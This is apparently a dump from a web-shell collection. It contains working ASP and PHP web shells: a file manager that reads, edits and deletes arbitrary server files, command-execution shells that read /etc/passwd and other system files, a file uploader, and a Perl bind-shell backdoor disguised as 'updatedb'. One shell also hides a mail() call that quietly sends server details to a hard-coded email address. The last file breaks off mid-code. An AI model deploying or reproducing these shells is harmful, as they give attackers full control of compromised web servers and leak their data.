<td width="62" height="17" align="center" bgcolor="#E0E0E0"
onmouseover="this.style.background='#A0A0A0'"
onmouseout="this.style.background='#E0E0E0'"
style="CURSOR: hand"
>
<a href="klasvayv.asp?klas=<%=dongu.driveletter%>:\" style="text-decoration: none">
<font face="Verdana" style="font-size: 8pt" color="#000000">Gir</font></a></td>
</tr>
</table>
</td>
</tr>
</table>
<%
end if
end if
%>
<%
next
%>
</center>
</div>
<div align="center">
<center>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber4" height="4">
<tr>
<td width="484" height="4" align="center" bgcolor="#C5C5C5">
<span style="font-size: 2pt">&nbsp;</span></td>
</tr>
</table>
</center>
</div>
<p>&nbsp;</p>
</td>
</tr>
<tr>
<td width="100%" height="19" bgcolor="#000000">&nbsp;</td>
</tr>
</table>
<%
else
%>
<%
if request.querystring("kaydet") <> "" then
set dossisx=server.createobject("scripting.filesystemobject")
set dosx=dossisx.opentextfile(request.querystring("kaydet"), 2, true)
dosx.write request("duzenx")
dosx.close
set dosyax=nothing
set dossisx=nothing
end if
%>
<%
if request.querystring("duzenle") <> "" then
set dossis=server.createobject("scripting.filesystemobject")
set dos=dossis.opentextfile(request.querystring("duzenle"), 1)
sedx = dos.readall
dos.close
set dosya=nothing
set dossis=nothing
set aktifklas=request.querystring("klas")
%>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
<tr>
<td width="70" bgcolor="#000000" height="76">
<p align="center">
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
<td width="501" bgcolor="#000000" height="76" valign="top">
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
<span style="font-weight: 700">
<br>
AventGrup©<br>
</span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
<span style="font-weight: 700">
<br>
KlasVayv 1.0</span></font></td>
<td width="431" bgcolor="#000000" height="76" valign="top">
<p align="right"><span style="font-weight: 700">
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
<a href="http://www.aventgrup.net" style="text-decoration: none">
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
</tr>
<tr>
<td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
<tr>
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
<span style="font-size: 8pt">&nbsp;Çalýþýlan Dosya</span></font></td>
<td bgcolor="#D6D6D6" height="20">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
<tr>
<td width="1"></td>
<td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=response.write(request.querystring("duzenle"))%></font></td>
<td width="65">
&nbsp;</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
<tr>
<td width="100%" bgcolor="#000000">&nbsp;</td>
</tr>
<tr>
<td width="100%" bgcolor="#000000">
<form method="POST" action="klasvayv.asp?kaydet=<%=request.querystring("duzenle")%>&klas=<%=aktifklas%>" name="kaypos">
<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red">
<textarea name="duzenx"
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
rows="24" cols="163" wrap="OFF"><%=sedx%></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
&nbsp;</font></b></p>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber19">
<tr>
<td width="100%" align="right">
<p align="center">
<span class="gensmall">
<input type="submit" size="16"
name="duzenx1" value="Kaydet"
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
</span><a href="klasvayv.asp"><input type="reset" size="16"
name="x" value="Vazgeç"
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
</span></a></td>
</tr>
</table>
</form>
</td>
</tr>
<tr>
<td width="100%" bgcolor="#EAEAEA">
<p align="right">
&nbsp;</td>
</tr>
</table>
<%
else
%>
<%
if request.querystring("klas") <> "" then
aktifklas=Request.querystring("klas")
if request.querystring("usak") = "1" then
aktifklas=aktifklas & "\"
end if
else
aktifklas=server.mappath("/")
aktifklas=aktifklas & "\"
end if
if request.querystring("silklas") <> "" then
set sis=createobject("scripting.filesystemobject")
silincekklas=request.querystring("silklas")
sis.deletefolder(silincekklas)
set sis=nothing
'response.write(sil & " Silindi")
end if
if request.querystring("sildos") <> "" then
silincekdos=request.querystring("sildos")
set dosx=createobject("scripting.filesystemobject")
set dos=dosx.getfile(silincekdos)
dos.delete
set dos=nothing
set dosyasis=nothing
end if
select case aktifklas
case "C:" aktifklas="C:\"
case "D:" aktifklas="D:\"
case "E:" aktifklas="E:\"
case "F:" aktifklas="F:\"
case "G:" aktifklas="G:\"
case "H:" aktifklas="H:\"
case "I:" aktifklas="I:\"
case "J:" aktifklas="J:\"
case "K:" aktifklas="K:\"
end select
if aktifklas=("C:") then aktifklas=("C:\")
Set FS = CreateObject("Scripting.FileSystemObject")
Set klasor = FS.GetFolder(aktifklas)
Set altklasorler = klasor.SubFolders
Set dosyalar = klasor.files
%>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
<tr>
<td width="70" bgcolor="#000000" height="76">
<p align="center">
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
<td width="501" bgcolor="#000000" height="76" valign="top">
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
<span style="font-weight: 700">
<br>
AventGrup©<br>
</span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
<span style="font-weight: 700">
<br>
KlasVayv 1.0</span></font></td>
<td width="431" bgcolor="#000000" height="76" valign="top">
<p align="right"><span style="font-weight: 700">
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
<a href="http://www.aventgrup.net" style="text-decoration: none">
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
</tr>
<tr>
<td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
<tr>
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
<span style="font-size: 8pt">&nbsp;Çalýþýlan Klasör</span></font></td>
<td bgcolor="#D6D6D6" height="20">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
<tr>
<td width="1"></td>
<td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=response.write(aktifklas)%></font></td>
<td width="65">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
<tr>
<td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13">
<p align="center"><font face="Verdana" style="font-size: 8pt">
<a href="klasvayv.asp?usklas=1&klas=<%=server.urlencode(left(aktifklas,(instrRev(aktifklas,"\"))-1))%>" style="text-decoration: none">
<font color="#000000">Üst Klasör</font></a></font></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
<tr>
<td width="625" bgcolor="#000000"><span style="font-size: 2pt">&nbsp;</span></td>
</tr>
<tr>
<td bgcolor="#000000" height="20">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
<tr>
<td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
<tr>
<td align="center" bgcolor="#5F5F5F"
onmouseover="style.background='#6F6F6F'"
onmouseout="style.background='#5F5F5F'"
style="CURSOR: hand"
height="19" bordercolor="#000000">
<span style="font-weight: 700">
<font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
<a href="klasvayv.asp?suruculer=1" style="text-decoration: none">
<font color="#9F9F9F">Sürücüler</font></a></font></span></td>
</tr>
</table>
</td>
<td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
<tr>
<td align="center" bgcolor="#5F5F5F" height="19"
onmouseover="style.background='#6F6F6F'"
onmouseout="style.background='#5F5F5F'"
style="CURSOR: hand"
bordercolor="#000000">
<font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
<a href="klasvayv.asp?klasac=1&aktifklas=<%=aktifklas%>" style="text-decoration: none">
<font color="#9F9F9F">Yeni Klasör</font></a></font></td>
</tr>
</table>
</td>
<td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
<tr>
<td align="center" bgcolor="#5F5F5F" height="19"
onmouseover="style.background='#6F6F6F'"
onmouseout="style.background='#5F5F5F'"
style="CURSOR: hand"
bordercolor="#000000">
<font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
<a href="klasvayv.asp?yenidosya=<%=aktifklas%>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
<tr>
<td width="30" height="17" bgcolor="#9F9F9F">
<font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Tür</font></td>
<td height="17" bgcolor="#9F9F9F">
<font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Dosya
Adý</font></td>
<td width="122" height="17" bgcolor="#9F9F9F">
<p align="center">
<font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Ýþlem</font></td>
</tr>
</table>
<% For each oge in altklasorler %>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
<tr>
<td width="30" height="17" bgcolor="#808080">
<p align="center">
<img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif"></td>
<td height="17" bgcolor="#C4C4C4">
<font face="Verdana" style="font-size: 8pt">&nbsp;<%=oge.name%>&nbsp;</font></td>
<td width="61" height="17" bgcolor="#C4C4C4" align="center">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
<tr>
<td width="100%" bgcolor="#A3A3A3"
onmouseover="this.style.background='#BBBBBB'"
onmouseout="this.style.background='#A3A3A3'"
style="CURSOR: hand"
height="20">
<p align="center"><font face="Verdana" style="font-size: 8pt">
<a href="klasvayv.asp?klas=<%=aktifklas%><%=oge.name%>\" style="text-decoration: none">
<font color="#000000">Aç</font></a></font></td>
</tr>
</table>
</td>
<td width="60" height="17" bgcolor="#C4C4C4" align="center">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
<tr>
<td width="100%" bgcolor="#A3A3A3"
onmouseover="this.style.background='#BBBBBB'"
onmouseout="this.style.background='#A3A3A3'"
style="CURSOR: hand"
height="20">
<p align="center"><font face="Verdana" style="font-size: 8pt">
<a href="klasvayv.asp?silklas=<%=aktifklas & oge.name & "&klas=" & aktifklas %>" style="text-decoration: none">
<font color="#000000">Sil</font></a>
</font></td>
</tr>
</table>
</td>
</tr>
</table>
<% Next %>
<% For each oge in dosyalar %>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
<tr>
<td width="30" height="1" bgcolor="#B0B0B0">
<p align="center">
<img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/1.gif"></td>
<td height="1" bgcolor="#EAEAEA">
<font face="Verdana" style="font-size: 8pt">&nbsp;<%=oge.name%> </font>
<font face="Arial Narrow" style="font-size: 8pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ( <%=Round(oge.size/1024,1)%> KB )&nbsp;</font></td>
<td width="61" height="1" bgcolor="#D6D6D6" align="center">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
<tr>
<td width="100%" bgcolor="#D6D6D6" no wrap
onmouseover="this.style.background='#ACACAC'"
onmouseout="this.style.background='#D6D6D6'"
style="CURSOR: hand"
height="20">
<p align="center"><font face="Verdana" style="font-size: 8pt">
<a style="text-decoration: none" target="_self" href="klasvayv.asp?duzenle=<%=aktifklas%><%=oge.name%>&klas=<%=aktifklas%>">
<font color="#000000">Düzenle</font></a></font></td>
</tr>
</table>
</td>
<td width="60" height="1" bgcolor="#D6D6D6" align="center">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="20">
<tr>
<td width="100%" bgcolor="#D6D6D6" no wrap
onmouseover="this.style.background='#ACACAC'"
onmouseout="this.style.background='#D6D6D6'"
style="CURSOR: hand"
height="20">
<p align="center"><font face="Verdana" style="font-size: 8pt">
<a href="klasvayv.asp?sildos=<%=aktifklas%><%=oge.name%>&klas=<%=aktifklas%>" style="text-decoration: none">
<font color="#000000">Sil</font></a></font></td>
</tr>
</table>
</td>
</tr>
</table>
<% Next %>
<%
if aktifklas=("C:\") then aktifklas=("C:")
%>
<%
end if
%>
<%
end if
%>
<%
end if
%>
<%
end if
%>
<%
end if
%>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
<tr>
<td width="100%" bgcolor="#000000">&nbsp;</td>
</tr>
</table>
</body>
</html>

34
138shell/L/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.txt Normal file
View file

@ -0,0 +1,34 @@
<?
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit</font></b><br>";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="Çalýþtýr" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>Hýzlý Menü :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">Tüm Açýk Portalarý Gör</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="Göster Bakim">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
$liz0=shell_exec($_POST[baba]);
$liz0zim=shell_exec($_POST[liz0]);
$uid=shell_exec('id');
$server=shell_exec('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>";
echo "<b><font color=red>Server</font></b>:$server<br>";
echo "<b><font color=red>Komut Sonuçlarý:</font></b><br>";
echo $liz0;
echo $liz0zim;
echo "</h4></pre>";
?>

89
138shell/L/lamashell.txt Normal file
View file

@ -0,0 +1,89 @@
<?
if($_POST['dir'] == "") {
$curdir = `pwd`;
} else {
$curdir = $_POST['dir'];
}
if($_POST['king'] == "") {
$curcmd = "ls -lah";
} else {
$curcmd = $_POST['king'];
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>lama's'hell v. 3.0</title>
<style type="text/css">
body {
color: white; background-color: black;
font-size: 12px;
font-family: Helvetica,Arial,Sans-Serif;
}
</style>
</head>
<body>
<pre>
_ _
/ \_______ /|_\
/ /_/ \__
/ \_/ /
_|_ |/|_
_|_ O _ O _|_
_|_ (_) _|_
\ /
_\_____________/_
/ \/ (___) \/ \
\__( o o )__/ <?
$ob = @ini_get("open_basedir");
$df = @ini_get("disable_functions");
if( ini_get('safe_mode') ) {
echo "SM: 1 \\ ";
} else {
echo "SM: 0 \\ ";
}
if(''==$df) {
echo "DF: 0 \\ ";
} else {
echo "DF: ".$df." \\ ";
}
echo "".php_uname()."\n";
?>
<hr></pre>
<table><form method="post" enctype="multipart/form-data">
<tr><td><b>Execute command:</b></td><td><input name="king" type="text" size="100" value="<? echo $curcmd; ?>"></td>
<tr><td><b>Change directory:</b></td><td><input name="dir" type="text" size="100" value="<? echo $curdir; ?>"></td>
<td><input name="exe" type="submit" value="Execute"></td></tr>
<tr><td><b>Upload file:</b></td><td><input name="fila" type="file" size="90"></td>
<td><input name="upl" type="submit" value="Upload"></td></tr>
</form></table>
<pre><hr>
<?
if(($_POST['upl']) == "Upload" ) {
if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir."/".$_FILES['fila']['name'])) {
echo "The file has been uploaded<br><br>";
} else {
echo "There was an error uploading the file, please try again!";
}
}
if(($_POST['exe']) == "Execute") {
$curcmd = "cd ".$curdir.";".$curcmd;
$f=popen($curcmd,"r");
while (!feof($f)) {
$buffer = fgets($f, 4096);
$string .= $buffer;
}
pclose($f);
echo htmlspecialchars($string);
}
?>
</pre>
</body>
</html>

513
138shell/L/load_shell.php.txt Normal file
View file

@ -0,0 +1,513 @@
<?
error_reporting(0);
/* Loader'z WEB Shell v 0.1.0.2 {15 àâãóñòà 2005}
Âîò êàêèå îí ïîääåðæèâàåò ôóíêöèè.
- Ðàáîòà ñ ôàéëîâîé ñèñòåìîé ñ ïîìîùüþ PHP.  óäîáíîé òàáëèöå ïðåäñòàâëåíî ñîäåðæèìîå òåêóùåé ïàêè (äîáàâëåíèå â ýòîé âåðñèè, íîðìàëüíûé âèä ïðàâ, à íå ÷èñëî :)).
- Âûïîëíåíèå êîäà, ïõï ðóëèò ;)
- Ðàáîòàåò ïðè register_globals=off
- Áîëåå ïðèÿòíàÿ ðàáîòà â ñåéô ìîäå
- Ïðîñìîòð è ðåäàêòèðîâàíèå ôàéëîâ.
- Çàêà÷êà ôàéëîâ ñ äðóãîãî ñåðâåðà ñ ïîìîùüþ ñðåäñòâ PHP.
- Çàêà÷êà ôàéëîâ ñ âàøåãî æåñòêîãî äèñêà.
- Âûïîëíåíèå ïðîèçâîëüíûõ êîìàíä íà ñåðâåðå.
- Ñêðèïò âûäàåò çíà÷åíèå íåêîòîðûõ ïåðåìåííûõ. Íàïðèìåð îí ñîîáùèò âêëþ÷åí ëè ñåéô ìîä, åñëè äà, òî ñêðèïò âûâåäåò äèðåêòîðèþ êîòîðàÿ,
âàì äîñòóïíà, à òàê æå ïóòü, ãäå âû ìîæåòå âûïîëíÿòü êîìàíäû.
- Ðàáîòà ñêðèïòà îñíîâàíà íà îïðåäåëåíèè òèïà ñåðâåðà.
- Åñëè ñêðèïò ðàáîòàåò ïîä óïðàâëåíèåì ÎÑ Windows, äàííûå ïîëó÷àåìûå ïðè âûïîëíåíèè êîìàíä ïåðåêîäèðóþòñÿ â win-1251.
- Ïðèñóòñòâóåò ïðîñòåíüêèé ñêðèïò ïåðë-áèíä. Âû ìîæåòå óêàçàòü äîìàøíþþ äèðåêòðèþ è ïîðò íà êîòîðîì ïîâåñèòñÿ áåêäîð.
Loader Pro-Hack.ru
*/
?>
<style type='text/css'>
html { overflow-x: auto }
BODY { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; margin: 0px; padding: 0px; text-align: center; color: #c0c0c0; background-color: #000000 }
TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: #c0c0c0; background-color: #0000000 }
BODY,TD {FONT-SIZE: 13px; FONT-FAMILY: verdana, arial, helvetica;}
A:link {COLOR: #666666; TEXT-DECORATION: none}
A:active { COLOR: #666666; TEXT-DECORATION: none;}
A:visited {COLOR: #666666; TEXT-DECORATION: none;}
A:hover {COLOR: #999999; TEXT-DECORATION: none;}
BODY {
SCROLLBAR-FACE-COLOR: #cccccc;
SCROLLBAR-HIGHLIGHT-COLOR: #CBAB78;
SCROLLBAR-SHADOW-COLOR: #CBAB78;
SCROLLBAR-3DLIGHT-COLOR: #CBAB78;
SCROLLBAR-ARROW-COLOR: #000000;
SCROLLBAR-TRACK-COLOR: #000000;
SCROLLBAR-DARKSHADOW-COLOR: #CBAB78}
fieldset.search { padding: 6px; line-height: 150% }
label { cursor: pointer }
form { display: inline }
img { vertical-align: middle; border: 0px }
img.attach { padding: 2px; border: 2px outset #000033 }
#tb { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
#logostrip { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
#content { padding: 10px; margin: 10px; background-color: #000000; border: 1px solid #CBAB78; }
#logo { FONT-SIZE: 50px; }
input { width: 80; height : 17; background-color : #cccccc;
border-style: solid;border-width: 1; border-color: #CBAB78; font-size: xx-small; cursor: pointer; }
#input2 { width: 150; height : 17; background-color : #cccccc;
border-style: solid;border-width: 1; border-color: #CBAB78; font-size: xx-small; cursor: pointer; }
</style>
<script>
function tag(thetag) {document.fe.editfile.value=thetag;}
</script>
<title>Loader'z WEB shell</title>
<table height=100% "width="100%">
<tr><td align="center" valign="top">
<table><tr><td>
<?php
@$dir = $_POST['dir'];
$dir = stripslashes($dir);
@$cmd = $_POST['cmd'];
$cmd = stripslashes($cmd);
$REQUEST_URI = $_SERVER['REQUEST_URI'];
$dires = '';
$files = '';
if (isset($_POST['port'])){
$bind = "
#!/usr/bin/perl
\$port = {$_POST['port']};
\$port = \$ARGV[0] if \$ARGV[0];
exit if fork;
$0 = \"updatedb\" . \" \" x100;
\$SIG{CHLD} = 'IGNORE';
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in(\$port, INADDR_ANY));
listen(S, 50);
while(1)
{
accept(X, S);
unless(fork)
{
open STDIN, \"<&X\";
open STDOUT, \">&X\";
open STDERR, \">&X\";
close X;
exec(\"/bin/sh\");
}
close X;
}
";}
function decode($buffer){
return convert_cyr_string ($buffer, 'd', 'w');
}
function execute($com)
{
if (!empty($com))
{
if(function_exists('exec'))
{
exec($com,$arr);
echo implode('
',$arr);
}
elseif(function_exists('shell_exec'))
{
echo shell_exec($com);
}
elseif(function_exists('system'))
{
echo system($com);
}
elseif(function_exists('passthru'))
{
echo passthru($com);
}
}
}
function perms($mode)
{
if( $mode & 0x1000 ) { $type='p'; }
else if( $mode & 0x2000 ) { $type='c'; }
else if( $mode & 0x4000 ) { $type='d'; }
else if( $mode & 0x6000 ) { $type='b'; }
else if( $mode & 0x8000 ) { $type='-'; }
else if( $mode & 0xA000 ) { $type='l'; }
else if( $mode & 0xC000 ) { $type='s'; }
else $type='u';
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);
}
/*Íà÷èíàåòñÿ*/
/*Îïðåäåëÿåì òèï ñèñòåìû*/
$servsoft = $_SERVER['SERVER_SOFTWARE'];
if (ereg("Win32", $servsoft, $reg)){
$sertype = "winda";
}
else
{
$sertype = "other";}
echo $servsoft . "<br>";
chdir($dir);
echo "Total space " . (int)(disk_total_space(getcwd())/(1024*1024)) . "Mb " . "Free space " . (int)(disk_free_space(getcwd())/(1024*1024)) . "Mb <br>";$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
if (ini_get('safe_mode') <> 1){
if ($sertype == "winda"){
ob_start('decode');
echo "OS: ";
echo execute("ver") . "<br>";
ob_end_flush();
}
if ($sertype == "other"){
echo "id:";
echo execute("id") . "<br>";
echo "uname:" . execute('uname -a') . "<br>";
}}
else{
if ($sertype == "winda"){
echo "OS: " . php_uname() . "<br>";
}
if ($sertype == "other"){
echo "id:";
echo execute("id") . "<br>";
echo "OS:" . php_uname() . "<br>";
}
}
echo 'User: ' .get_current_user() . '<br>';
if (ini_get("open_basedir")){
echo "open_basedir: " . ini_get("open_basedir");}
if (ini_get('safe_mode') == 1){
echo "<font size=\"3\"color=\"#cc0000\">Safe mode :(";
if (ini_get('safe_mode_include_dir')){
echo "Including from here: " . ini_get('safe_mode_include_dir'); }
if (ini_get('safe_mode_exec_dir')){
echo " Exec here: " . ini_get('safe_mode_exec_dir');
}
echo "</font>";}
if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "")
{
copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
}
if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
{
$data = implode("", file($_POST['filefrom']));
$fp = fopen($_POST['fileto'], "wb");
fputs($fp, $data);
$ok = fclose($fp);
if($ok)
{
$size = filesize($_POST['fileto'])/1024;
$sizef = sprintf("%.2f", $size);
print "<center><div id=logostrip>Download - OK. (".$sizef."êÁ)</div></center>";
}
else
{
print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>";
}
}
if (isset($_POST['installbind'])){
if (is_dir($_POST['installpath']) == true){
chdir($_POST['installpath']);
$_POST['installpath'] = "temp.pl";}
$fp = fopen($_POST['installpath'], "w");
fwrite($fp, $bind);
fclose($fp);
exec("perl " . $_POST['installpath']);
chdir($dir);
}
@$ef = stripslashes($_POST['editfile']);
if ($ef){
$fp = fopen($ef, "r");
$filearr = file($ef);
$string = '';
$content = '';
foreach ($filearr as $string){
$string = str_replace("<" , "&lt;" , $string);
$string = str_replace(">" , "&gt;" , $string);
$content = $content . $string;
}
echo "<center><div id=logostrip>Edit file: $ef </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=100 rows=20>$content</textarea>
<input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
<input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br>
